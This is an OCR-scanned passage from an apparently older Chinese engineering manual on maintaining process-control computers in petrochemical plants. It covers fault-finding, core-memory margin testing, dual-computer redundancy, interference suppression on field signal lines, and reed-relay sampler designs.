清为“0”,工作程序被强迫转移到0地址。在0地址下面,增 设一段溢出处理程序,主要内容是该回路前几次测量值的顺推,以及本次阀位改变量输出清“0”,使出现溢出时,该回路本次 不起调节作用,阀位维持原状,避免由于计算失误,造成阀门误 动作,而引起工艺上的事故。经过这样处理后,大量的溢出状态 均可由操作人员在控制台上处理掉,而无需停机。可大大减少停 机次数,提高机器控制的可靠性。 五、克服误操作的保护措施 例如当人工提降量时,有时由于误操作将阶码设错,将给定 值增大十倍或缩小十倍,造成生产混乱。对这类误操作可采用程 序限制变化量的方法,比如说限制每次变化量不能超过原有量的 若超过,则认为是误操作,机器不接收这一数据,并进行 报警。从而达到保护的目的。 六、检查程序 为了提高机器应用的可靠性,可以编制一些检查设备和处理 设备故障的有关程序。例如: 1. 内存设备运行考查程序。 2。运算器及操作台系统检查程序。 3. 外部设备检查程序(输入、输出设备和中断系统)。 4. 在线控制检查程序等等。 第八节 查寻故障的 一 般方法 查寻故障的一般方法有以下几种。 1. 单脉冲 每启动一次发出一个脉冲信号,即执行一个动 作,可采用万用表测量有关门电路双稳电路的静态工作电平。测 试方便,比较直观。 2。步进 每启动一次执行一条指令,可检查一条指令执行 是否正确。若发现某条指令工作不正常,可利用示波器观察波形 (观察时反复执行出错指令),找出是哪一个动作不对,进而找出故障点。 3. 观察动态波形 观察时应选好同步信号,最好采用既能看动态波形又能反映其直流电平的双迹示波器。这样的示波器能 方便的观察两信号的相对时间关系及动态时的直流工作电平。观察时可采取单指令反复循环或执行几条指令的循环程序,通过逐 级观察波形,找出故障点。 4. 程序检查 检查程序要求有以下功能: (1)应能全面地检查机器所有设备; (2)应能检查设备的一切可能工作状态; (3)应能模拟最坏的工作状态; (4)程序能连续运转; (5)采用积木式结构,随时能组合、补充、修改; (6)执行程序要由简单到复杂; (7)出错时能打印、显示、报警,必要时能停机; (8)检查内容可以任意选择、任意判断和对比。 计算机如配置有完善的检查程序,则能迅速准确的找出故障 点,及时排除故障。 下面根据不同故障性质(固定性、半固定性及偶然跳动), 分别说明采取何种方法进行查寻。 一、固定性故障的查寻方法 固定性故障一般为:半导体元件及其它元件损坏,短路、断 线等。对于固定性故障, 一般可通过逻辑判断,找出是哪一个部 件、哪一条指令出错。这时可通过单脉冲以及单指令反复工作方 式进行查找。在采用单脉冲检查时,每一个脉冲信号作用后,测 量一下有关命令及其控制触发器和寄存器的静态电位,或者观看 有关指示灯。若发现哪一个动作后出错,则可逐级测量找出其故 障点。也可采用反复执行某一条指令逐级观察波形,若发现某一 级无波形,可从无输入信号,布线有短路以及负载故障等三个环 节逐一查找,最后,找出故障点。在没有查找到某一部件或某一 指令前,可先利用检查程序找出故障部件及出错指令。有的机器 也可用故障灯指示错误性质,然后着手去查寻故障。此类故障一 般来说便于查找。 二、半固定性故障的查寻方法 对于半固定性故障,如元件性能变化,接触不良,虚焊等查 找起来就比较困难。往往观察到故障后正准备查找或正在查找 时,会突然恢复正常,这样就使得操作人员无从下手继续查找。 对于这类故障,可采取恶化条件的办法。如变电压、变频、升温、 振动等办法让它变成固定性故障,然后采用排除固定性故障的方 法, 一步一步进行查找。但往往一些半固定故障在恶化条件时不 能变成固定性故障,这时只能在运行过程中,采用试探的方法, 将有关怀疑的插件板换掉,对有关接插件进行仔细检查和清洗, 检查一下布线有无断线。总之,将有关怀疑部件全部检查一遍。 另一种办法是积累运行资料,从大量数据中找出其规律性的东西 来,最后着手解决。 三、偶然跳动故障的查寻方法 对于随机干扰源引起的偶然跳动,应摸索出干扰的规律性, 出现的时间、地点、环境条件、工作方式等各种特点,从大量的 资料中找出干扰源,采取有关相应措施进行排除。 内存读出信号很小,怕干扰。同时内存线路中大电流的驱动 源较多,其干扰源也多。所以,内存磁芯跳动一般比较频繁,严 重影响稳定性。 一般可采用“下雨检查”的方式找出薄弱环节。 也可采用通梅花程序找出薄弱环节,磁芯中某位跳动,例如 “0”→ “1”,对三度禁止电流重合法来讲,其造成“0”→ “1”的 可能性很多。从大的方面来看有两种可能: 一种是写“0”变成 写“1”,另一种可能为读“0”时干扰信号读出,造成“0”→ “1”。 写“0”时应发禁止电流,若禁止电流小,或Iz 、I, 过大,都会 造成写“0”变为写“1”。另外读“0”时也可能由于干扰信号幅 度大、读放抗干扰能力低,再生寄存器乱翻等都可能造成读“0” 变成读“1”。内存的读写本身就构成一个闭合回路,有时往往找 了一圈还不知故障所在。要保证内存可靠运转,可采用在变电压、 调驱动源,以及读放灵敏度的情况下,通最坏布局检查程序。让 内存有一个稳定的工作区域,从中找出其最佳工作点,以保证内 存可靠运行。 本节介绍了查寻故障的一般方法及三种类型故障的具体查找 办法。在运用时应根据具体情况具体分析,分别进行处理。 第九节 定 期 检 修 一、边缘校验 机器投入稳定运行后,主机故障大部分为偶然跳动。可利用边缘校验手段排除即将失 效的元组件。采用拉偏电 源、改变主脉冲频率、升 温等方法可淘汰一些动态 特性不好的元组件。 一般 常用的是拉偏电源的办 法。此外,有时也采用敲 打插件的方法,对组件机 械性能较差,及插头、插 座接触有问题的地方予以 排除。对于TTL 电路, 其逻辑电源只有5V一种,这里就不多谈了,重点谈一下分离元件 计算机的变电源校验。 一般一个电源单独变化15~20%,其他所 有电源同时变化5~10%左右,机器能正常运行,这样可淘汰一 些元组件。 二、内存工作区的调试 目前采用的内存大多为磁芯存贮器采用的存贮方案有好几种。如:三度(3D) 三线制、三度(3D) 四线制、二度半二度等。其实现方法尽管有所不同,但其基本思想 是一样的, 一般包括以下几个部分:①选字系统:包括地址寄存器、电压译码、电流译码。②读出 回路:包括读放、读驱动、再生寄 存器。③写入回路:包括再生寄存 器、写驱动、禁止电流等。④时间链:产生读、写、禁止、选通等 控制信号。上面讲到的变电压边缘 校验,同样适用于内存。但其考虑 问题的出发点不一样。主要考虑读 写时,能可靠读“1”读“0”或写“1” 写“0”。下面以禁止电流重合法为例加以说明。 1。写“0”可靠 要求I,I, 的写波足够大,但不能过大若Ix,I, 半选电流太 大会造成写“0”时禁止电流禁止不了,造成写“0”变成写“1”。 若内存写波上限有一定范围,而禁止只在下限,此时有足够的写 波上限范围,说明写“0”是可靠的。 2. 写“1”可靠 在写波足够小时能将“1”写上。若写波下限范围很大,机 器工作时写“1”就比较可靠。 3。读“0”可靠 读波调到较小,此时半选打扰小,禁止电流也小,使连续半 选干扰小,读放灵敏度放到最小,此时干扰信号较小,同时读 “1”信号相应的也减小,若此时读放输出不丢失“1”信号,说 明有较宽的工作范围。 4. 读“1”可靠 读波调到较大,禁止也放到最大,此时对读“1”有利,同时半选干扰和禁止电流造成的连续半选干扰也大。此时,将读放 灵敏度放到最灵敏,看干扰信号能否输出。若内存能正常工作, 说明有较大工作区域。 5. 时间链的调整。 在长时间运行后,线路参数可能发生变化。若发现内存稳定 性很差时,可调整时间链,让选通时间与读出信号的峰值相重 合。改变读写波及禁止的相互时间,使其重合性好,则前后沿干 扰小。在定期检修时一般不用调整时间链。 总之,在调试内存工作区时,通过变电源调整有关电位器, 让读写驱动、禁止、读放等能有一个较宽的稳定工作区。在进行 上面调整时,内存通过严格的检查程序进行检查。根据工作范围 的大小,选取最佳的工作点,这样可保证机器可靠运行。 三 、插件的检修 对插件定期进行清洗和测试,能发现一些元件性能变坏和接 触不良引起的故障。对于达不到测试标准的插件板应进行修复。 在拔板时,应一部分、 一部分地进行清洗测试。清洗主要为插 头部分,清洗、测试完一部分后,上机检查一下能否正常运转。 若不能正常运转,应查找原因。因插拔后可能带来新的接触不良 或短路等问题。若动的面较大,查找起来就比较困难。对一些按 键、继电器触点等也应进行定期清洗。以保证接触良好。 四、接地及电源的检修 定期对电源及地线纹波进行测试,看有否滤波电容损坏。 一 般滤波电容损耗大,加之电源发热大,造成滤波电容干枯老化。 当发现纹波大时,应检查滤波电容是否失效。对于地线,应测量 接地电阻,看有无变化,有无多点接地。此外,对过欠压、过流 保护系统也应检查是否好用。对于负载电流应进行测试。在发现 电源问题较多时,可对每台电源的稳压性能进行测试。总之,应全 面检查供电系统有无问题。对检修中的问题均应仔细加以处理, 以保证供电系统工作可靠。 第十节 加 强 管 理 一、作好运行记录 在运行中作好运行及故障处理记录。在逻辑变更时,应对相 应图纸进行修改,修改时要慎重。对于检修情况,也应作好详细 记录。总之,要保证原始资料准确、齐全。对于一些偶然跳动, 只有在计算机长期运行中积累大量资料,从大量第一性材料中总 结摸索出规律性的东西来。作好运行记录还可避免作重复工作。 往往由于记录不详,几个班作重复的工作,既浪费人力,又影响 进度。对于逻辑修改,图纸一定要作相应改动,否则会使有关同 志不知道,在查找故障时观察波形不对就会认为是机器发生故 障而造成错误。所以,作好运行记录,是一项严肃认真的工作, 切不可等闲视之。通过记录可以把一个人的经验和教训变为大家 所有。 二、重视备品备件 搞好备品备件工作,为计算机长周期运行提供充足的物质基 础。在计算机运行中,发生元件损坏或工作不可靠,造成工作不 正常时,只要我们有足够的备品备件,熟练的技术水平,在几分 钟内换上备板,完全不会影响正常生产。若没有备板就可能处理 几个小时, 这就会影响生产。所以准备好备品备件,能缩短故 障处理时间,提高机器使用效率。对于备品, 一定要作到备而有 用,不要备而无用,因此, 一定要保证备品备件的完好。对于换 下的插件应立即修复。备品备件必须进行严格老化测试、挑选。 对于关键设备,如模/数转换器、数据放大器等,应有备件。保证 备品备件的完好齐全,是十分重要的。进口机器备品备件来源缺 乏,要进行试验,逐步用国产元件替换,以保证计算机长期运 转。 三、建立健全岗位责任制 建立健全以岗位责任制为中心的各项规章制度,是搞好计算 机运行维护的有力保证。这些规章制度包括: 1. 主机、外围等各部分的岗位专责制度。 2. 巡回检查制度。应包括巡回路线、间隔时间及详细的检 查项目和标准等。 3。设备维护保养制度。包括维修时间和维护内容等。 4. 岗位练兵制度。 5. 安全工作制度。 6. 有关质量的其他责任制度等等。 四、努力提高技术水平 计算机能否用于生产, 一方面受计算机系统的质量影响;另 一方面,也与使用人员的维护水平有很大关系。 对于计算机维护人员,要求熟悉以下方面的内容: 1. 机器的逻辑原理、线路、基本程序; 2. 各部件的位置; 3. 重要观察点的位置; 4。名种操作的典型波形; 5。机柜间的连接、主机和外部设备及外围设备之间的连接; 6。各种元件的性能及正确使用; 7. 空调、供电等辅助设备的性能; 8。各种调测工具、手册、图表等的使用。 第三章 双 机 系 统 第一节 概 述 目前在计算机控制系统中,大量采用冗余技术。即将一些关 键部件作成两套,其中一套发生故障时,不影响机器工作。或者 同样性质的多台设备共用一台备用设备,以提高机器可靠性。近 年来我国已有几个单位采用双机系统以提高整个系统的可靠性。 尤其是当计算机可靠性不高时,采用双机以提高整个控制系统的 可靠性是有其显著效果的。对于并列系统的可靠性可按如下方式 计算: 设:甲机为A₁, 乙机为A₂ 则 A=1-(1-A₂)(1-A₁) 例如两台计算机都是平均运转500小时,检修1小时。则它 们各自的控制系统运转率为: 双机系统的运转率为: A=1-(1-A₁)(1-A₂)=99.96% 这相当于平均控制生产2499小时,检修1小时,从而大大提 高了机器可靠性。 第二节 应 用 举 例 一、某炼油厂常减压双机系统 该厂常减压装置原有一台HOC-510 机,为了提高系统控制功能和提高系统可靠性,又增设了一台JS-10A 机。平时采用SCC 和 DDC 分级控制方式。JS-10A 机 在 第 一 级 作 DDC 控制, HOC-510 为第二级作为SCC控制。当JS-10A 机故障时,可由程 序自动切换到HOC-510 机控制。此时HOC-510 机承担 DDC和一 部分数学模型的计算工作。采取双机后大大提高了系统的可靠 性。两台计算机采取如下结构: 1. 模拟量输入各自独立,由变送器送来0~10m.A 电 流 信 号,经4000电阻变为0~4V, 分别送到两台计算机。 2。双机之间的信息交换,分别用开关量输入,开关量输出 进行信息交换,还分别设有四个中断接点,作为交换时的特征表示。 3. 两台计算机的数据设定和显示共用排码开关和显示头,并 共用外操作台,靠一切换开关可随时进行切换。 4. 模出和报警两台计算机共用,在代码总线处进行切换。 二、某化工厂对二甲苯装置双机控制方案 该厂分主、副机双机控制,其主副机功能区分为: 1. 主机 具有主控程序、数据处理以及有关计算和12点的 SPC 控制以及在副机故障时兼任副机的吸附塔阀门顺序控制功能。 2。副机 主要功能是担负吸附塔的148只阀门的顺序控制。 当副机故障时由主机代替。 主副机切换由程序输出继电器动作自动实现。副机不能代替 主机工作。只要有一台机器运转正常,就能保证生产过程的重要 环节吸附塔148只阀门的顺序控制。 三、某化工厂乙烯装置双机控制方案 该厂采用两台DJS-154 机实现 DDC 控制,新型调节规律控 制、顺序控制、监督控制。其中一台为备用。除模出部件为双机 公用外,其余所有设备包括控制台所有设备均为两套。模出虽为 公用,其每路均为两套设备同时工作。若其中一套设备出现故 障,另一套设备仍能正常工作。而此时主机接收故障信息后可发出 报警信号,由打字机打印信息。通知维护人员进行处理。所以, 模出实际上也是两套。该系统是完全的双机系统。两台机器同处 于运行状态, 一台机器工作另一台处于备用状态,机器事故时可 实现自动切换。 双机切换过程为;各种输入信号同时进入A 、B 两机组,首 先B 机组进行在线控制,当运行中B 机组发生自身不可克服的故障时,向双机控制器发出中断停机信号,要求换A 机组工作。双机控制器接受信号后向A 桃组发出准备切换信号,等A 机组回答 已准备好后,切换开关把模出部分由B 机组切换到A 机组,这样A 机组就进入了在线控制。两机也可采用手动切换。 四 、某化工厂分级控制方案 1. 双机系统 TQ-1机与TQ-3 机组成双2系统,实现对醋酸乙烯合成反应 器的多参数控制,以提高计算机可靠性。输入信号可单独或同时 送入两台计算机,输出部分的执行机构共用一套,可进行切换。 运行方式为一机运行, 一机监督,同时输入进行计算并比较输 出值,基本符合时才认为正确,可以输出,否则不输出。正常运 行,监督机不介入。运行机的主要运算参数值改变时,均立即由 数据交换通道送入监督机,运行机故障时,可进行输出切换,监 督机也可强迫进行切换。 2。分级控制 TQ-3 机为中央机,YJ-1 机 TQ-1 机为车间级计算机,车间 级计算机完成本车间的企业管理工作、多种新型调节规律的控制 及最优化数学模型工作。计算工作量较大时送入TQ-3 机进行, 计算完毕后把结果送回。TQ-3 能主动进行数据交换,而TQ-1 、 YJ-1 机对TQ-3 机的要求通过中断实现。TQ-3 机还承担全厂管理 工作,如集中调度、工资计算等。 三台机器之间的数据交换通过数传机实现。速度为2000位/ 秒,串并行方式传输。 从上面介绍的几个实例,可大致归纳为三种情况。 一种是配 有一台功能较全、容量较大的机器,可代替另一台小机器的工作 (例一和例二)。它们的输出共用一套系统,当输出系统发生问题 时,会影响双机的工作。第二种是采用功能完全相同的两台计算 机互为备用,所有外围设备均为完全独立的两套(例三)。 一般来 说,这种方案整个系统的可靠性要高。第三种由于进行全厂性控 制,控制对象比较分散,采用了数字通讯设备。此外,在双机系 统中,两台机器同时运算,将计算结果进行比较无误后,才进行 输出,故准确度较高(例四)。 总的来说,采用双机系统后,能大大提高系统的可靠性,当然成本也随之增高。因此 ,应根 实际需要选用。 第四章 现场信号的传输 第一节 概 述 要使控制机能正确地运算并控制生产过程,就必须要求信号 测量正确,保证在规定的精度范围内。为此,凡使用控制机的单 位,在机器未投入运行控制之前,就必须充分注意机器与现场输 入信号的连接,分析并及时消除影响信号测量正确性的各种因 素。尽管现场条件比较复杂,各不相同,但影响信号测量正确性 的因素不外两个方面:①巡回检测系统本身。其任何部分的不可 靠,都会直接影响信号测量的正确性。②现场的电磁干扰。这是 任何使用单位必须注意而且肯定会碰到的问题。如不妥善地消除 各种干扰的影响,巡测精度就不能保证。尤其是小信号放大,严重 的干扰可使巡回检测无法正常工作,致使控制机失去“眼睛”,不 能进行正确的运算控制。本章将着重讨论现场干扰的有关问题, 提出若干克服干扰的措施。同时还对影响信号测量正确性的有关 问题,如信号线的选择、敷设、对信号的处理等进行一些分析, 并提出应注意的事项。至于巡回检测系统本身(即采样器、放大 器、模/数转换器等)对信号测量正确性的影响,本章不作分析, 而安排在以后各有关章节里另作具体讨论。 第二节 现场干扰对信号测量正确性的 影响及克服措施 一、干扰的来源 由于现场条件多变,所以干扰的来源也是多方面的,有时甚 至是错综复杂的。在整个输入系统中,干扰既可能来源于外部, 也可能来源于内部。因此,对不同的情况必须进行具体分析,不能千篇一律地对待 二、干扰的形成 干扰源所产生的干扰,往往以不同的形式出现,图4-1例举 了几种常见的噪音(高频噪音、50周噪音、机内调制噪音、不规 则低频噪音、直流噪音),这些干扰讯号可能是有规则的,也可 能是无规则的(有的可通过示波器或万用表量出),在现场接线 或屏蔽处理不好时,就可能产生串模干扰或共模干扰。 三 、串模干扰 (Eom ): 又称常态干扰或横向干扰。它是迭加在被测直流信号上的交 流信号(如图4-2),这是串模干扰引入的总的表现形式,其中V, 为信号源,Emm为迭加在V.上的串模干扰。此外,串模干扰也可 能从信号源本身产生,如图4-3所示,故在分析串模干扰时也不 能忽视。 图4-4和图4-5是干扰源通过分布电容把干扰引入至放大器输 入端的原理图。 在图4-4和图4-5中,En 为交变电源,I。为交变电流,由 E,(或Ia) 产生的电磁干扰信号(包括雷电干扰)就会通过C; 和 C₂的耦合,引入放大器的输入端。干扰量引入的大小是与C₁ 和C₂的数值有关的,如果两根信号线对干扰源的距离不等(即 d₁÷d₂), 那么其分布电容 C₁ 和 C₂的容量也就不等,由于它们 所能通过的干扰频率是不一致的,所以它们所引入的干扰分量也 就不能相互抵消,从而在输入端产生了串模干扰。 实践证明,如果d₁≈d₂,C₁≈C₂, 如图4-5所示,那么干扰 将能比较有效地受到抑制。这也是用双股绞线作为信号线比平行 线效果好的原因之一。另外,如果采用屏蔽线作为信号线,则又能降低C₁ 和C₂ 的数值,从而提高了抗干扰能力。 这里须着重指出,分布电容的存在,在任何情况下都是引入 串模干扰的主要途径,远距离传输线(几十米或一百米以上)尤 易引入。 四、 串模抑制比 (NMR) 为了定量地表示对串模干扰的抑制能力,可用串模抑制比这 个概念来说明。 NMR=201g(Eom/Emx) 其中 Eom——串模干扰电压; Emax——转换误差; 1/r—— 为干扰频率; r—— 干扰周期; T—— 采样周期。 从上式可知,随着干扰频率1/ r 的增加,则串模抑制能力将 增强,也就是说,对于低频率串模干扰的抑制是较困难的。 五、串模干扰的抑制 目前对串模干扰的抑制方法大多采用在信号输入端加上适当 的滤波电容,或采用双股绞线或屏蔽线作为信号线,均能有效地 消除串模干扰。另外,也有采用对输入信号的平均值而不是瞬时 值进行转换,使串模干扰被“平均掉”。 六、共模干扰 (Ecm) 又称共态干扰或纵向干扰。 一般说来控制机的地与讯号地之 间往往要相隔一段较长的距离,几十米以至一、二百米,在两地 之间往往存在着一个电位差,这就是共模电压Ecm。它可能是直流电压,也可能是交流电压,其数值可达几伏或几十伏,严重时 可达一、二百伏以上,这与现场和机器接地情况以及其他产生干 扰的因素有关。如一次表电源变压器漏电,往往会引入很高的共 模电压。这种干扰电压的引入,必定严重地影响信号测量的正确 性,甚至使放大器无法工作 下面对信号以两种不同形式输入时共模干扰的引入作简单的 分析: 放大器为单端输入时共模电压的引入 由于Em的存在,所以产生共模电流,所以,引入放大器输入端的共模电压是:Ecm-x=IemZ, 式中 Z,-- 信号源内阻加上导线电阻; Rx—— 放大器输入阻抗。 这里,由于Icm而产生的输入干扰,实际上已转换成串模干 扰的形式而加入到放大器输入端。放大器的输入阻抗越大,信号 源内阻越小,则越有利于提高抗共模干扰的能力。 七、共模抑制比(CMR) 及其测量 为了表示抗共模干扰能力的强弱,引入共模抑制比这一概 念。其表达式为 式中 Ecm-#—— 为放大器输出端由于Ecm而引起的噪音。 此式表明,尽量减小E 在放大器输出端引起的噪音Ecm-a, 能使 共模抑制比显著提高。 共模干扰的测量接线图如图4-9所示。在输入端接上1K 的 测量电阻,屏蔽线接高端。用变压器人为加入共模电压△E-m, 此时测出输出电压△E, 若放大器增益为K, 八、共模干扰的抑制 ]。整个等效电路相当于由E-m供电的电桥。 2。太大的Ecm会损坏桥路,即破坏测量系统。 3。桥路的任何不平衡,均会使E:m在BB'间建立电压,使共 模干扰变成串模干扰。 由上述分析可引入如下抑制共模干扰的途径: 1. 抑制共模电压,也就是减少。(或消除) Ecm 2. 抑制共模变串模的可能性。 (尽量减小△Vse) 3. 抑制已形成的串模干扰。 九 、输入信号的抗干扰滤波 在信号输入端采用阻容滤波,是一种简易而较有效的方法。 目前使用也较普遍,比较常用的为π型滤波形式 选择合适的滤波时间常数,如使滤波时间常数大于采样接点 闭合时间,则可使Em 不能达到它的最大值(因为直流共模干扰 Ecm 变换成串模干扰Emm, 其变换速度是受到滤波时间常数限制 的)。从而提高了抗干扰能力, 一般说,增大C 比 增 大R 效果更 好些。 关于滤波器各参数的选择,以图4-11为例, R₁ 、R₂ 一 般 选 几十欧至几百欧,C₁ 、C₂ 一般选0.01HF~100HF。 具体数值大多 根据现场的干扰情况(干扰源的频率)通过实验而定。也可先进 行计算,然后通过实验确定。如根据公式 -求C,Xc 值可根据经验先假设一个近似值。然后按t=RC 的公式求r, 从 而确定所设计的滤波环节的滤波能力(适应范围),然后通过现 场试验而最后确定其数值。 另外,也可在采样输入端分别对地并接约1000HF的电容,其 低通滤波效果也较好。如图4-13所示。 第三节 信 号 传 输 线 一、信号线选用原则 对于信号线的选择, 一般从经济,实用两个方面考虑。而抗 干扰能力则是选择何种信号线所必须重点考虑的内容之一。不同 的现场,干扰情况不同。在许可条件下,则可尽量选用价钱便宜, 敷设方便的信号线。 二、信号线的选择 (一)信号线类型的选择 采用多股电缆较好,但价格稍贵一点,其优点是可挠性好, 适宜于用电缆沟有拐角的、狭窄的地方,采用压线端子板接触性 较好。尤其是补偿导线,由于单线压线容易脱落,所以采用多股 导线更为可靠。电缆直径在50mm 以下,考虑到信号一般比较集 中,可使用30对(60芯)以下的电缆。从施工角度考虑,可同时 使用10对20芯、5对10芯、1对2芯的电缆。推荐使用带镀层的 导线束。 表4-3列出电缆主要的屏蔽结构及其屏蔽效果,供使用单位 选用信号线时参考。 (二)信号线粗细的选择 从考虑电缆价格、强度及施工方便等因素出发,信号线的截 面积在2mm² 以下为宜,目前国内一般采用1.5mm² 、1.0mm² 两种。 三、信号线的屏蔽及绞线的使用 对信号精度要求比较高,或干扰现象比较严重的现场,信号 线采用屏蔽是提高抗干扰能力的可行途径。但由于带屏蔽层的信 号线价格较贵,而且现场安装、接地处理较其他导线(绞线、平 行线)困难,所以也有不少单位使用绞线或平行线。但由于平行 线所引起的分布电容较大,抗干扰能力差,所以采用绞线比平行线好。 绞线作为信号线具有经济、实用(敷设方便,抗干扰能力较 强)的优点,在一般场合下用作信号线是比较普遍的。 四 、信号线敷设的注意事项 为避免受到干扰,信号线敷设要注意以下事项: 1。信号线的敷设要尽量远离干扰源,如避免敷设在大容量 的变压器,电动机等电器设备的近旁,有条件时要做到单独穿管 配线,支架多时上下顺序为信号电缆、低压电缆、AC 和DC 电源 电缆,高压电源电缆。 2. 模拟信号与数字信号、脉冲信号不能合用同一根电缆, 数字信号与脉冲信号也不能合用同一根电缆。 3。信号电缆与电源电缆必须分开,并尽量避免平行敷设。 如果由于现场条件所限,信号线与机器电源不能不敷设在一起时, 则应满足以下条件: (1)电缆沟内要设置隔板,且使隔板与大地连接(图4- 14(a))。 (2)电缆沟内用电缆架隔离,若电源电缆不带屏蔽时,在 220V 电流大于10A时,其间距离则应在60cm 以上。 (3)若在电缆沟底自由敷设时,两种电缆间隔应在15cm 以上,若电源电缆不带屏蔽电源电压在220V以下,电流大于10A时,其间距应在60cm 以 上。 (4)电源电缆使用 屏蔽罩(图4- 14(d))。 4. 信号线为屏蔽线 时,屏蔽层要有一端接地 良好,同时要避免多点接 地。 5、远距离的传输线, 其衔接一般通过接线箱进 行。为便于检查维修,应 设置计算机专用接线箱, 以便与现场其他仪表接线 分开。 6. 现场信号线敷设 必须考虑到防湿,防振。为了保证所测信号的 正确性,在输入的采样值 被正式使用之前,还需经 过人为的判断处理。而对 测量信号的处理往往与工 艺要求,机器容量及编制 程序的方便等多方面的因 素有关。在满足工艺要求的情况下,对信号处理采用较简单的方法有两大优点:①可减少 采样次数,延长干簧使用周期。②可节约内存单元并便于程序的 编制。 一 、采样值越限判断 对于输入信号一个基本要求是所测数值必须在合理的范围之 内,否则该采样值的输入,对正常的运算控制将是有害的。因此, 当被测信号值输入后,首先要判断该信号值是否在合理的范围之 内。如果由于现场的各种原因(如一次表失灵等),至使输入的 信号大大超出正常范围(上限或下限),则所采入的信号值就不能 用,该次采样值可用上一次代替。若a₁ 是t₁ 时间的有用讯号,az、a₃分别为tz,t₃时间的采样值。 如果|a₂-a₁|>B, 则a₂ 不能采用,可存放在某一单元中,待t₃ 时再采样一次,此时若采样值为a;, 且 |a;-a/|<B 则认为a; 为合理的采样值,可以采用;若采样值为a”, 且 |a”-a₂|>B,则认为az,a” 都是正常的采样值,而取 为即时的采样值。这种判断方法比较折中,既照顾了采样的实时性,也照顾了采样值 变化的平滑性,有利于控制过程的平稳。 二、对关键测点的处理 但是对于一些比较关键的测点,只进行限值的判晰是不够 的,而必须再进行一次数字滤波处理。 第五章 标度变换及采样器 第 一 节 概 述 在石油化工系统中,被测参数一般为温度、流量、压力、液 面四大类。在信号送入放大器之前,必须把被测信号变换成在一 定范围内的统一信号,这就是标度变换所需完成的工作。如果有 的信号(如温度的毫伏数)已在被测范围之内,也可不需进行标 度变换。 被测信号经过标度变换之后通过采样器送至放大器放大,所 以说采样器是被测信号输入至计算机的“门户”,实质上它是一个 多点切换开关,能将已变换为统一信号的被测参数按一定时间间 隔和规律,逐点接入数据放大器的输入端。 第二节 标度变换器 一、简介 被测信号变换成的统一信号,有直流和交流两种,目前国内 一般均采用直流统一信号。因为交流信号受市电50Hz 频率的影 响,干扰较大,同时交流信号还容易受分布电容影响,会引起相位误差。 统一信号又分电压制和电流制两种形式。电流制的优点是适 于远距离传输,负载能力大,抗干扰能力较强等。但由于电流制 标度变换器制作复杂、成本高、也不便于现场维修,所以国内使 用的单位不多。 电压制标度变换器则是目前国内应用较广的一种形式。它的 特点是制作简便、成本低、便于维修、可靠性也较高。 此外,还处在发展阶段的是数字式变送器,它将是标度变换 器的一种形式——频率制。目前,国内石油化工系统尚未使用。 二、 电压制标度变换器的种类及特点 表5-1列出了电压制标度变换器的种类及特点。 第三节 采 样 器 一、原理简介 采样器主要由地址寄存器、译码器、XY 方向驱动器、干簧 矩阵及振荡器组成。在单调时,地址寄存器通过自动计数方式使 地址码计数,此时译码器则顺序译出第1至第n 个采样点号,使 XY 方向驱动器分别工作,相应的干簧线圈就通过电流,该干簧 闭合,被测信号即可接通。在采样器与主机联调时,采样器的地 址可由主机送出,实现随机采样。 采样器的驱动器方案不一,目前常用的有反相器驱动,跟随 器驱动及节约二极管的驱动方法等。 二、技术要求 选购采样器时所应考虑的技术要求如下: 1. 检测点数及速度 根据不同的控制对象而定, 一般说, 控制对象规模大则检测点数多,控制对象反应快,则要求采样速 度也快。 2。干扰电平 在开关断开时,不应有输出,要求干扰电平 小于一定范围。 3。采样方式 可有随机采样和顺序采样两种。 4. 前后沿的抖动时间 主要影响采样速度及精度,所以希 望抖动时间尽量短,如果采样速度高,对前后沿要求更严格。 5. 对地绝缘电阻良好。 三、采样开关种类及比较 四、选用各种采样开关的条件 五、采样开关方案介绍 应用干簧继电器作为采样器切换开关,是目前国内石化系统 较普遍采纳的方案。除了能满足速度和精度的要求之外,其突出 的优点是方案简单、易于实现、造价也较便宜。常见的方案如下。 (一)干簧采样 1. 不分组 一次采样采用JAG-4-2H 双刀单掷型干簧。 这种方案是干簧采样方案中最简单的一种。此方案也有其常 见的缺点如下: (1)一旦有干簧吸死,信号源不能隔离,致使引入干扰, 而相互影响被测信号的正确性。 (2)干簧吸死后,机器亦无法自动查出吸死点,给维修带 来困难。 种 类 特 点 缺 点 干 簧 (1)接触电阻小(约<50mQ) ( 2 ) 开 路 电 阻 大 ( 一 般 >1000MQ) (3)寿命一般为107次 (4)适用于小信号、中速度 (10~200点/秒) (5)结构简单、价格便宜 (6)使用时组合灵活 (1)因剩磁影响,有吸合不 放的现象 (2)吸合时间,抖动时间及 接点热电势的过渡时间的一 致性较差 ( 3 ) 功 率 低 (4)使用时须严格挑选 湿 簧 (1)可靠性高 (2)接点容量大 (3)前沿无抖动现象 (4)触点功率大,适用于大 信号测量、低速 (1)工作频率低 (2)安装有一定要求(方向 性 ) (3)制造工艺复杂 电子无触点开关 晶体管 工作频率高,采样速度快。 可达到1000点/秒以上 (1)因残压影响,使系统精 度受损失 (2)管子的一致性要求高, 须严格挠选 电子无触点开关 场效应管 (1)工作频率高,采样速度 快 (2)适用于1000点/秒以上 (3)断路阻抗高 (4)无残压影响 由于输入阻抗高,感应电势 太大时易损坏元件,须考虑保 护线路 朵样速度 开关种类 10~25点/秒 湿簧继电器 25点/秒至200点/秒 干簧继电器 200点/秒以上 电子无触点开关 2. 分组 二次采样采用JAG-4-2H 双刀单掷型干簧 此方案中, 一次采样八点为一组,之后增加一个干簧为二次 采样。当某一个一次采样干簧出了毛病时,其影响面只涉及该干 簧所在组的其他七个干簧,从而减少了采样的出错率。在检测点 较多的情况下,此方案优越性更为显著。 3。 一次采样 不分组,采用JAG-2-Z 双刀双掷型干簧 此方案的原理介绍见本手册第四章:抑制共模 干扰途径的信号源隔离法。 此方案中干簧吸死可有三种情况: ① 干簧吸死在B、D 两端点。因机器采样时首先闭合双刀 单掷干簧,使保持电容放电,而后再采样该干簧点,此时采样值 如为“0”,就表明该路吸死,因为现场信号极少有近似“0”的。 ② 干簧吸死在A、C 两端点。同样双刀单掷干簧先短路, 由于吸死在A 、C 两端点,采样时相当于放大器开路,采样码如 为溢出状态说明该路干簧吸死。 ③ 干簧的任一端吸死,情况同上,放大器开路,采样码 溢出。 可见,利用这种干簧的采样方案有如下几个突出优点: ① 由于它是靠电容C₂ (钽电容)保持输入信号,即便吸死 也不影响一次仪表。 ② 机器可随时检查出吸死点,并能打印出来,便于维护 修理。 ③ 能增强抗共模干扰的能力。 ④ 结构简单、造价较便宜、易于推广。 (二)湿簧采样 